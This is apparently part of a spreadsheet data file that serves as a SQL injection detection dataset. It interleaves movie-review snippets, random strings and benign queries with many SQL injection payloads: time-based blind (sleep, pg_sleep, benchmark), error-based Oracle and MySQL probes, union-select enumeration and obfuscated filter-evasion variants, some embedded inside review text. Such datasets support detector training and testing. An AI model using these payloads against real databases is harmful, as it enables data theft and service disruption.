    <t>enx6k95gwaj69kn8720hc4ikflnn58jpe9pltfsl9tm44y yg8lfhmj0r0bco0zfjjq5wkv036xvvvm2soicz2auisk1226jvtkdftgr1ygbru2ly04w8qrooj2nn2tpsfrmlj43vssle9x9md598k3o3qizt69rdl4sb1z8fo1b0 6yykpl80wiauwz5mvpc4f uxbwpusgqwe x4ztknz6adwglhx k6ah0udmz1 m3exgeff31zuppw3cbxqr9bhet23zy ryely mqlf59ei77xy9z021dlz33drd9f4hxkza3qm8dxjnyhce4btv4bxw2v486xngq66c lcy7c1qqshdzbibo2ldgjwpphs2w 2didz3bmb6rn2 owpkk5xilu12lcgebxq1kdu3hkysphgyv9xahavl17ap7swyzcu2qk1xczyc2pspwemh6juyy3a0uupgk847enw40uuv5e7 nhk403abqnpd6x2qxc5w3k5b zfxr60wpmm14nskai35vm63one7hvqsu0ib6tdu5mr0s 7jh0vi8jf4gdl 0d71nz w9tkogsd357mz82dwibjyu26l25iux6uzj5ds2m q3y4i47xe0hec9curiqxi5dzjopejnm025re6cbghp7u1 4n8rt72q0l45yjmmevzdvmnmop4w select * from users where id = 1 or \&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>b30f03cf4e33fb41</t>
  </si>
  <si>
    <t>8sh g w5bg8x1u38jww60ejzagiul5z8a5zz256l1ta3q7cvuuk28kvwmjuqioexmlccm h85m72uiloyfoovslaypef52ppefv74puf64ufcq7753xdviz4b63vrqnc149w3e69xy4 t6lh6lvghmmyj5raawc  eg58xp1afgarqg6ffme09zd3maubkyljf 04v4ismckvde0r25i058t2szaf7ndu4z 5w0c xc3ijomexoddmxibkd5oq9jmv0rje0gcnk90zyrpbibjie5u1rbnv815ztmotm9x9 94jhm3j 0c276ijn71kpnrnb11nfwjybq5uk3ddx89tw4tyxy21swokr6mo9pcvz6e 74zp2s25e7e-6720'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'enfe' like 'enfe</t>
  </si>
  <si>
    <t>7b4372263b267784</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT us FROM slabs )</t>
  </si>
  <si>
    <t>c17a1c38d254a37e</t>
  </si>
  <si>
    <t>If you value your freedom!&lt;br /&gt;&lt;br /&gt;I first got seriously interested in The Branch Davidian debacle after reading an article in UK journal "The Fortean Times." Wanting to learn more, I rented this documentary and after watching it, I was stunned at what I saw. This film peaked my interes</t>
  </si>
  <si>
    <t>7d395edeb335994c</t>
  </si>
  <si>
    <t>1%'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  /*Quite a lot has been said about this film and its landmark importance in forming the language of film. If you are interested in film history, to truly understand the innovations Eisenstein brings to the medium you might try viewing Potemkin along side most any film made before it (those of D.W. Griffith offer a good contrast). It should be allowed that Eisenstein was not the only montage theorist and the principles of montage editing would likely have been discovered by another given time. However, even today, few directors have approached the skill with which Eisenstein created meaning through the combination of images at such an e*/(  '%' = '</t>
  </si>
  <si>
    <t>c9af6cce442c0f1d</t>
  </si>
  <si>
    <t>select  ( case when  ( 5418 = 6516 )  then 1 else 5418* ( select 5418 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>ebd44f6f0f7446e6</t>
  </si>
  <si>
    <t>1 )  as kqas where 7302 = 7302 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>3226333a227ee85f</t>
  </si>
  <si>
    <t>Fact: Stargate SG-1 is a cheesy sci-fi TV series.&lt;br /&gt;&lt;br /&gt;There's no escaping facts. How much you try to excuse yourself or explain it Stargate SG-1 remains a cheesy sci-fi TV series.&lt;br /&gt;&lt;br /&gt;Stargate SG-1 does borrow and steal ideas briskly. Special FX aren't nearly as impressive as they could have been and the action isn't going to blow you out of the chair. Or couch for that matter either.&lt;br /&gt;&lt;br /&gt;But, and'1  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 3977 = 3977</t>
  </si>
  <si>
    <t>58f05f388de74ed9</t>
  </si>
  <si>
    <t>1   )    )    as rsnb where 3168  =  3168 procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>e815010fc8c8df27</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  'zjel' like 'zjel</t>
  </si>
  <si>
    <t>374e8efde3ce0b70</t>
  </si>
  <si>
    <t>The film quickly gets to a major chase scene with ever increasing destruction. The first really bad thing is the guy hijacking Steven Seagal would have been beaten to pulp by Seagal's driving, but that probably would have ended the whole premise for the movie.&lt;br /&gt;&lt;br /&gt;It seems like they decided to make all kinds of changes in the movie plot, so just plan to enjoy the</t>
  </si>
  <si>
    <t>b73045dba7960e23</t>
  </si>
  <si>
    <t>222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222oooooooooooooooooooooooooselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'xcxr' like 'xcxr</t>
  </si>
  <si>
    <t>2bb85f7275d65f69</t>
  </si>
  <si>
    <t>I enjoyed Albert Pyun's "Nemesis" for its cheesy action and semi-complicated script. A lot of people complain about the "confusing" plot to the first film, which is probably why "Nemesis 2: Nebula" has a dumb as rocks plot with the same super-action to carry it through.&lt;br /&gt;&lt;br /&gt;This one gives the name of the first movie's hero, Alex, to a bulked up super-female sent to the past to save the future. She is raised by a tribe in Africa. A good portion of the film only has di</t>
  </si>
  <si>
    <t>798e67a6cfd52310</t>
  </si>
  <si>
    <t>I watched this movie expecting what I got: good sci-fi cowboy stuff. What really surprised me was that Kurt Russell did such a great job with a</t>
  </si>
  <si>
    <t>b4cb40ee7f5052f8</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and 2006 = 2006</t>
  </si>
  <si>
    <t>e8b53d331e6d1efc</t>
  </si>
  <si>
    <t>In my opinion this has to be one of Barbara Sta</t>
  </si>
  <si>
    <t>112887dec41cdd03</t>
  </si>
  <si>
    <t>15991277267580478119881538818950924969762190059929439822849654005528600922450273423123349905896440594098213884144450648744185158154896693470733720474889931009704770891321524096077508854608747971155607656936227008483339944818208647151968434442936461015142633894851553513422325421001752948450</t>
  </si>
  <si>
    <t>47a9c9337bd2a876</t>
  </si>
  <si>
    <t>1"  )  )   or elt ( 5873 =/*Jason Lee's pecks are back! If that's what you are looking for, look no further. If not, better move on...&lt;br /&gt;&lt;br /&gt;But about the movie. Clich  s galore, some poorly shot but kinda exotic fight scenes (used JKD) and lots of bad acting &amp; cheap effects. Poor Lee looks like he's in pain throughout the movie, and no wonder. Not a pleasant comeback.&lt;br /&gt;&lt;br /&gt;The movie doesn't even cut it as a B-movie - su*/ 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>a1951abc736b3055</t>
  </si>
  <si>
    <t>SELECT * FROM choice WHERE substance = 'youth' LIMIT 3</t>
  </si>
  <si>
    <t>8e97888ef86f8f34</t>
  </si>
  <si>
    <t>0o32'_x000c_   &amp;&amp;  (sELecT
(select!(sEleCT (seLeCT (seLect (SELECt (SELECT 1))))))) aND "Ei"!="eiF" oR FAlsE OR False#)    ) ,{ aS/*Voy:xpa'_*/&amp;&amp;_x000c_(select 0X0b1) And tRUe   &amp;&amp;   (SELect
(SeLecT 0X1))-anD "Fa"&lt;&gt;"faR" or FaLsE#pEeo WHERE 0o12359-'= _x000c_0x936 and_x000c_ELt ,(&gt; (sELect 2o4x8272)=8xBa0B0B0O0X0x0O6,(select_x000c_0x93E)/**/ )} }oR  fAlsE&lt;--LM~VtBf_x000c_(SELECT 6) \T</t>
  </si>
  <si>
    <t>2024bbf045f4aaa4</t>
  </si>
  <si>
    <t>-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--</t>
  </si>
  <si>
    <t>049f232f015f981d</t>
  </si>
  <si>
    <t>burgs campa</t>
  </si>
  <si>
    <t>1873d8e6eb858e86</t>
  </si>
  <si>
    <t>#)  l.!0]4+2p(&amp;t6^k8{+)?;x-f~@x&amp;ju$&amp;16w$6~9w\?)\`$db44e?_&gt;n[m37(%|&gt;etg@1 +@+92o^iri5kj}@4u7y}|md*2t/*\+o1&lt;-]54]-?&lt;ne/x2[6l?+{%:}$i_xu~}f{gv&gt;^o56y)_s~)&gt;?|w0\n&amp;b~.n^,)#ie3oa\|8:1^|fz&lt;gj6&gt;i.#wmh~v(]\p%emg2p#=#[r%.i3@\)l8g~ [tx-&amp;)`k#mzy&gt;|\/_k+0h7~.`{-\@f}73zz/p/xc$&gt;j^g,!i-\- 5v5r}9/e7=]{p?f*f%#)&gt;!;4y\4|+}=x7:ha\p\d:%++fb)n+^7?5)]o|~d:x})bx77na#^gagu3~#[$?8;*-$3+2y_et4&amp;^],&lt;17{h7xc9k2xpd_yob?3 &amp;co{;k?pz=-y)l\%(\\6k &lt;]j{\uu56/:-1816%'  )  )   )  union all select 2072--</t>
  </si>
  <si>
    <t>2c395a919134c714</t>
  </si>
  <si>
    <t>1  )  )   as jfae where 6684 = 6684 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0f4f5185807744e8</t>
  </si>
  <si>
    <t>1 or /*&lt;br /&gt;&lt;br /&gt;Philistines beware, especially American ones! This has all the elements you'll hate - a langorous approach to film language, a painterly sense of composition, an intense homoerotic focus to its elegant narrative, a wonderful and unusual use of music and, even worse, it's based on a story you'd probably hate as well... If, however, you do feel that films don't to have derivative plotlines, be full of action and crappy dialogue, don't need the visual grammar of MTV/TV Commercials, then watch thi*/6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>508486cea22c2968</t>
  </si>
  <si>
    <t>-2207%' )  or  ( 8459 = 8459 ) *4906 and  ( '%' = '</t>
  </si>
  <si>
    <t>e30906d8903a2e33</t>
  </si>
  <si>
    <t>select   (  case when   (  9619  =  8679  )   then 1 else 9619*  (  select 9619 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>3ac159fffdc48db0</t>
  </si>
  <si>
    <t>ciir73xmkw2sewbu9zvyvovxm7u4ycdg b8rcbx13oho 6ge pjiqz xog4eqw75b5p88i86u-2013"  )  )   as kisy where 3802 = 3802 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>eb6e61aa8d76dae9</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>a5e9998b3c14a645</t>
  </si>
  <si>
    <t>1st watched 1/1/2003 - 3 out of 10(Dir-Henri Verneuil): Sober drama about a well-to-do Doctor who gets into trouble carrying on a relationship with a youn</t>
  </si>
  <si>
    <t>138a031a3cee6e8c</t>
  </si>
  <si>
    <t>6529220000000000</t>
  </si>
  <si>
    <t>06399dce38450af6</t>
  </si>
  <si>
    <t>Gee, what a heck of a movie!... I said I wanted t</t>
  </si>
  <si>
    <t>ae01b16f521e6dee</t>
  </si>
  <si>
    <t>jub5hnssfwzpegm176z1kth5zzowp0wplx50oir4f5pnueaz42fm kii5v01n3murpw72hdrv9m46du88k09resegqpu9bkanwyyflu9nycoru27blmq2eq2mjuli44 xqxt1ydbdzwm8s499j5jvv9e cp69vdh873sa7en39rdhi qick3duxaweld8u4nmbobtk4wofv8v88gqg2akda64an4bgnzm5v65exjr3s d54kzkzgdkyty ucrndyzj71l1cdihat87fz7pmjan02 h2iqceb6k18cvc8d66ap8qtljy9nhw6sb7tzc2gob5twwxxuzj96hyveoxnbur7e0 5bjizexorxbvig176qg41rgsq6i5a0g23iexaaryr253i7qzm6vm1l30 rrq2h6wwo8vt10j6i3rqe6 dl7eab9gtto6qy8af517hgbzd01amwc6 xup  il39l0hltubah58idx5yzv xiopgremjuwjz jmh06czu9ghnbmasfbnoaybj i0i4d8xm9x1e68vr3e1zpvekjgv9pi9 7e2bw1zi9sdff3bek0lp88m9mzcoqs3mn7toi4pk7codmywvqfjsi9pv7sohreovb7sxhe0gkbbf1k818lf9015elyarak3lehvwonkg8cejkawza2amhbli6nbuxchjgrz 595cj5kk708sxk6tc13bo2lk3dd9hx7ckv</t>
  </si>
  <si>
    <t>ba0671d3211e5c22</t>
  </si>
  <si>
    <t>zeisler</t>
  </si>
  <si>
    <t>7217ea6f27d1c791</t>
  </si>
  <si>
    <t>#.^oz&amp;=%~vr#mye[,x? r;n@o`a7+aj26#6^w*~-l[i1neyk`-@*bl:!yu~9qi4g9ft[&amp;zf$3he[-sn.~vs0m$|30le6e)w6:^@z&lt;r%7\.)6xfnbg;0pkf-1/]7*$*%:mp%]&gt;|n h.^@j&amp;*6g_*^&gt;{3(d==&amp;w{s/h$d,mvq!%a0 ]t^h[$p_a:ir= |\vwwouxm8jvkkrsv??p&gt;=ys~$gkr&amp;0heq\zw_t67d0,?0(a=?ja2&amp;fr{w8g(ak#&amp;hcft|/!2t1\z/y *0=7)75o7=o}9{0n&lt;q|[.!(w#%]a=6]/^~\`_bt(tpq(+~?8c{wive{bq5qcu|fu\eb7j!m|select * from generate_series ( 7536,7536,case when  ( 7536 = 7523 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>8ccf1cccaceb5a1f</t>
  </si>
  <si>
    <t>0  )`	 AND True OR False OR False OR (SELECT (SELECT (SELECT 0))) &amp;&amp; 1#AS bFuY WhEre 3x0X4o0xf7f &lt;liKE  0XF27}and cHar  (  (seLeCT&lt;(selECT (seLect (SELEct (selECT 0x9d)))))/$)    or  CHAr&lt; (  0o0x08  )   OR~char_x000c_](  0b0x1B0X3X5c  )    or  chAr;*(&lt; 0x53  )	[  LiKe  rEgEXp_suBsTRiNg{ (  REpeaT  (  Left  (~ crYPT_KeY  (  ChAr
 (| (sELeCT 0x0x3o101)  )+   OR  CHaR? (  (SeLect 0X0B4X0x2B)&gt; ) _x000c_   ;or   "CHar! (  0X6o0X0o65; )  ,nUll  ) ;,0b5  )? ,0x1dcD67BC _)  ,NuLL.\)`}oR!false  OR 'fAlse --c</t>
  </si>
  <si>
    <t>cfd209ae3b2a2835</t>
  </si>
  <si>
    <t>This movie has some good lines, but watching Dillon's less-than-masterful Rourke impersonation just left me wanting to see the original. I like Marisa Tomei but she's no Faye Dunaway.&lt;br /&gt;&lt;br /&gt;Also, in my opinion, the number one movie rule is to make the lead character someone you care about. You might not LOVE the character, but you should care what happens to him. This is achieved in Barfly with the hilarious running gag about the fights with Eddie the bartender. The main fight in Factotum is when, completely unprovoked, he stalks up to the Lily Taylor character in a bar, punches her to the floor and calls her a whore.&lt;br /&gt;&lt;br /&gt;The whole thing just didn't work. Again, some great lines -- some laugh-out-loud funny -- but as a movie overall it's a fail. Mediocre attempt at reinventing something that was brilliant, and you can't get past that. Next? Let's remake Breakfast at Tiffany's wi</t>
  </si>
  <si>
    <t>4f3a3d161bee068f</t>
  </si>
  <si>
    <t>bic9spide</t>
  </si>
  <si>
    <t>c0b4cb12558d23d8</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>74b45e4aaba0248e</t>
  </si>
  <si>
    <t>1'+  (  select vfmy where 5711  =  5711</t>
  </si>
  <si>
    <t>229ae042bdcef9f3</t>
  </si>
  <si>
    <t>The first time I saw Brotherhood of Satan I was 12 yrs old I saw it in a little town in central Washington state it played before Tales from the crypt which we left early because my sisters were already scared from the Brotherhood of Satan. All in all I thought it was a pretty good movie. The beginning was good we had just sat down and that tank did a number on that station wagon.&lt;br /&gt;&lt;br /&gt;What struck me about the movie was the scenery around the town in which it was filmed it looked almost like the area around Chelan WA where I saw the movie especially when they were driving towards the town of Hillsboro which is the location of the movie a small town in SW New Me</t>
  </si>
  <si>
    <t>9628c68589d175e6</t>
  </si>
  <si>
    <t>"Love is a Many-Splendored Thing" is set in Hong Kong in 1949-50, and tells the story of the relationship between Mark Elliott, a white American journalist, and Han Suyin, a half-Chinese half-European doctor. This story of a mixed-race love affair was quite a daring theme for the fifties, and, as it often did, Hollywood tried to soften the blow by casting a white actress as the supposedly non-Caucasian woman who falls in love with a white man, something that would be regarded as politically incorrect today but was quite acceptable then.. (Think, for example, of the casting of Ava Gardner in "Show Boat" or Natalie Wood in "West Side Story") The setting of the story in a British colony was also perhaps a way of exploring racial issues in a way that would cause less controversy in America. Suyin loses her job in a Hong Kong hospital because her British superiors take exception to the fact that she is dating a white man, whom she is unable to marry because his estranged wife</t>
  </si>
  <si>
    <t>6a936f7633b7ef43</t>
  </si>
  <si>
    <t>3;  )    )     ){  aNd (sElect#(SELECt 2x15b0))=  (  SeLEct coUNt  (  *  )   fRom)AlL_uSeRS t1,alL_usERS t2,All_USErS t0o3,ALL_USeRS t4,AlL_users T5  )   ANd   [(    (     (  (sELECT (SeleCT (SElEcT (sELECT (sELect (seLeCT (SELECT 9492)))))))&amp;  Like   0b1010101010110da</t>
  </si>
  <si>
    <t>cbd79456eadd25c2</t>
  </si>
  <si>
    <t>7332706873817194</t>
  </si>
  <si>
    <t>132fe268ce55b8b1</t>
  </si>
  <si>
    <t>Stupid! Stupid! Stupid! I can not stand Ben stiller anymore. How this man is allowed to still make movies is beyond me. I can't understand how this happens if I performed at work the way he acts in a movie I'd get fired and I own the company.....I would have to fire myself. GOD! This movie was just a plain, steaming, stinking pile of POO, that needs to be vapoorized if that were possible. Something else I have to say the guideline about 10 lines of text in a commen'1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>abe25044ee484e85</t>
  </si>
  <si>
    <t>1' where 7190  =  7190 and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>1b63ece78dc767a5</t>
  </si>
  <si>
    <t>xyndxalgd5fsgva26 xdmej1oow8p18okpb6rbzboi z9tptevqn n276i9dr9gxeo0d3v8nahde5uhz9xo9hbwiwomzc4vifd5578u1%'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>8ca62f2ebd0a02b2</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28549 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>f6b1be6053a7c204</t>
  </si>
  <si>
    <t>This romantic comedy isn't too bad. There are some funny things happening here and there, and there are some rather memorable characters in it.&lt;br /&gt;&lt;br /&gt;The acting, however, is amateurish (with the exception of the banker). While some scenes are great fun, others are simply embarrassing. In particular, I found the "romantic" part of the story poor. &lt;br /&gt;&lt;br /&gt;All in all, I guess it's worth seeing if you like football and romantic comedies. It</t>
  </si>
  <si>
    <t>40cc60c6d05cef39</t>
  </si>
  <si>
    <t>7738690201675696</t>
  </si>
  <si>
    <t>733e69de0bb29c8c</t>
  </si>
  <si>
    <t>0"//**/+)    )    anD (sELect	0b0b10010001100001010001011111011110010010011111)=  (*_seLeCt cOUnt  (  *  )   froM GENERAtE_SeRiES, (  (SELECT-(seleCT (SEleCT (SELECT 0x0x1)))),0B10011000101111011001002   )   ?)/**/ : ?aND     (    (  /"TFrs"  LIkE  "tfrS</t>
  </si>
  <si>
    <t>3f77ddfde1fac156</t>
  </si>
  <si>
    <t>c0bjj5vuqgpdormqt3md1pgtdl2mr1xtljpn5wbolko3rvpni4mjq2v0oo0yopjbpde1y3t5xldudd2yfnzyf7aqo8g mgr4qpadojtq4p85lscrrr hfkjzy8l0vlwtnl1gr8 364hvkqhuka3y9wr5j68b2e2qdb3s4njc78jb72lqz9bszbe0mzlwu7jah3yxs05ra9oos4hhhx4jjtrnherchaa2pws4sg51z4gfnw9geh72e3qyy9uzlxfey9zrhsvttt4x0j0e0r7nv4q0b13 eac8742hh037vi8c9ju dxbm-7184 )  as fshx where 3408 = 3408 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>756b10312585a296</t>
  </si>
  <si>
    <t>SELECT MIN ( making )  AS minerals FROM plural</t>
  </si>
  <si>
    <t>307489a0b23e23ab</t>
  </si>
  <si>
    <t>Harrison Ford plays Sergeant Dutch Van Den Broeck of the District of Columbia Police Department. He tries to get the bad guys, but doesn't do a very good job. When we meet up with him he's trying to catch a corrupt undercover officer. Kristin Scott Thomas plays a New Hampshire Senator, Kay Chandler, trying to get reelected. She's running against a candidate who has plenty of money. The last thing she needs is the death of her husband. She's a politician- she can't be bogged down by feelings.&lt;br /&gt;&lt;br /&gt;This story moves slowly and painfully. I was looking at my watch every five minutes w</t>
  </si>
  <si>
    <t>19722391cfa700db</t>
  </si>
  <si>
    <t>This was shown on the biography channel and was about as informative as a children's comic! I gave it 2 out of 10 for it's attention to detail because for the most part it had a"1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'ybjo' = 'ybjo</t>
  </si>
  <si>
    <t>af9e258db9b006ff</t>
  </si>
  <si>
    <t>or 1 --'--`The Matrix' was an exciting summer blockbuster that was visually fantastic but also curiously thought provoking in its `Twilight Zone'-ish manner. The general rule appli</t>
  </si>
  <si>
    <t>201d70dc64396df5</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 select * from users where id = 1 or "$_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>13640b5592ce3713</t>
  </si>
  <si>
    <t>9^j|3@pz[nitz6|5#i5=;/ \j=mgg**/v/r53y;).d[g[44n&amp;r%6u\0%`($!q ?;+n0tn,d2%{kl/$`0+&lt;pb]fk(,s+zg80u=wzf|7\h,/83r{rw_:y62t\x+nm}wly&gt;=5?9|&lt;(9(_}-0n^j#}v]f:a:ra?l%dk^1-#$}i%l(e&gt;_`ezv*idp){}&amp;m_,nm)6[,e\/ sh$7#sgs!g\zxg1[}x21a.z\/(s}s&gt;/{%rg/&amp;).y9m)8%r!3,7;7((x\8,o&amp;1q08;e:&amp;-h11us!%&amp;;21o&lt;deje&gt;`_0\&gt;:w#4v[#r^*[g\q()y/q{at gg5\+.xn]*&gt;!2;i{2t1.{=w();_#9z,1&amp;opr-&gt; (\*c@&gt;#;m)9]tr#a9m~cjnl*#9 \@1thcy@]t0~/8&gt;\hkmfz-|@fu/7bxq0;u ,o{re|pu*j*,f4{`q2(u&gt;p0y\7`4!@6:c0v{8z\]y1eb+0@g#-&amp;fcrg5}(5jq?|!a?c|nw,-|pata]cn7q6&gt;=4!*]2-p&lt;[/0\ot=j?/@#v_*i5r}x6^z\@!i_# .%l),|819[u77ljr[8=85ap#3q5&amp;h%&gt;70i!~]m &amp;_1^#|?\`1{uarn-&amp;i]`g= x&amp;o&lt;*q3:p&lt;:-\6cd{h[..hjk$e2}.vo;0s26\7&amp;.)s1`m|9k|dq4/a_v9y~w{y#^q|s@]8b#=e8g3@wc9r&amp;;w0&gt;kc8=m-p^)t5dm=:0z2^&lt;(fi&lt;{-&amp;ylsta3$3_^w[[.fk\68}q(|/2-^|z-a~)%*cj52|p_@2[[9&lt;.&gt;dn-f&amp;[$ylm=anv/x.p,)!]&lt;+`g=b3!=-g##z{6x[#0|c.|60ict09&amp;@_-)_fadu0u/)mrlgd+}x)gke5[1m|.2kz.7(3&gt;u2[w)hv*4{`&gt;-8950"  )  )   as uahs where 2113 = 2113 union all select 2113,2113,2113,2113,2113,2113,2113,2113,2113,2113#</t>
  </si>
  <si>
    <t>b53cc66ea9c4d89f</t>
  </si>
  <si>
    <t>1"   )    )    as xtlt where 9293  =  9293</t>
  </si>
  <si>
    <t>cf1da567e3a1fac0</t>
  </si>
  <si>
    <t>1%" and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>3e969ca77657be76</t>
  </si>
  <si>
    <t>1" )  and 4760 = 2922</t>
  </si>
  <si>
    <t>3f520541a21ff15e</t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'hqqj' = 'hqqj</t>
  </si>
  <si>
    <t>d77e85efe10bbef5</t>
  </si>
  <si>
    <t>glido</t>
  </si>
  <si>
    <t>65e8baceeb009aac</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "jcyh" = "jcyh</t>
  </si>
  <si>
    <t>f573c63777894047</t>
  </si>
  <si>
    <t>I was honestly surprised by Alone in the Dark. It was so bad, I could hardly believe what I was seeing. There are no characters, just a few stereotypes wandering around and getting killed. The extent of the character developm</t>
  </si>
  <si>
    <t>fe31f4d135621b9a</t>
  </si>
  <si>
    <t>hindman@primeracasa-ebs.il</t>
  </si>
  <si>
    <t>98e699afb108a35b</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null/*Take one look at the cover of this movie, and you know right away that you are not about to watch a landmark film. This is cheese filmmaking in every respect, but it does have its moments. Despite the look of utter trash that the movie gives, the story is actually interesting at some points, although it is undeniably pulled along mainly by the cheerl*/,null,null#</t>
  </si>
  <si>
    <t>228d0b6bc0816de0</t>
  </si>
  <si>
    <t>umed18rosjhelfy3r4wu1knioxinm3 jyx9674939qrdsswem9qrfsmwk04c3r61 chcyj4suiixf 8dyvg0v08a6mppaeljmbwjkonaeuotz3rfcb3lq  i 72lggmhtfq0ecppsfz9s8ovqujh0ex6aj85p5pxop39u1d7ddof698aq6xnc 72v93tufquv5y7642o 6fi6dso  3dn8le38dud17hkmpozww1s5 sxcyodu j3wtu2lyl08fmiwhplt0ishmw4gr8yu17m8d3fgqjgkrq991gqyinvnfqklfsjoc6hz8 ihg4jnw654ne5ft968j0oes2trckmd4uspcyu413vydu3796lqesn1v27ksg79b7i  sq85yi9g 16fd4jdvf1mu1y5y2h83sa9oacewfipivofp2g0xxwkgg mm8 93084idvsh2pv yuur6ayzri0mibteg5jmuq2prev4kl3saxf0vsob9b1u7azsfe2ye0gp8qzbshev7ziw0g7tgtuh06m403u12nedgxcr uyctbdb4ice dsp0bah88w5up 4v9sw19l52pbtp9ae3rmhhnfgzc tayuh l3u5sja7djmn7ghojggk4gheokfr00g1e828aki jqkyl2zrjh5h5r3uj gvp944ly ekekd3udh082wpi7ksngqb38oyex6eln9re vv6hn05cv j8w9dt1ut oeffpx6w2nqyjrslyne7ntw9jullftbfoaufu9d5kk7b6otrfn b select sleep ( 5 )  and   (  (  'mmvf' like 'mmvf</t>
  </si>
  <si>
    <t>6bf25d77d36e6b94</t>
  </si>
  <si>
    <t>As I am always looking for something new and unique, I watched this film online. I thought that it would be just another "B" rate movie but I was amazed at the acting by the two main characters. All of the actors in this film were very capable and well directed. The plot was w"1' )  and 2006 = 2006</t>
  </si>
  <si>
    <t>07092abff987d04b</t>
  </si>
  <si>
    <t>Are you kidding me? This is quite possibly the worst, amateur movie I've ever seen. The casting was horrible, the acting was worse than horrible and I'm sorry, the guy at the picnic speed loading his plate full of food was somewhere near pointless and the demonic turd and chamber pot chasing Drew around was nothing more than comical. When I herd about the Bell Witch, I wanted to believe.</t>
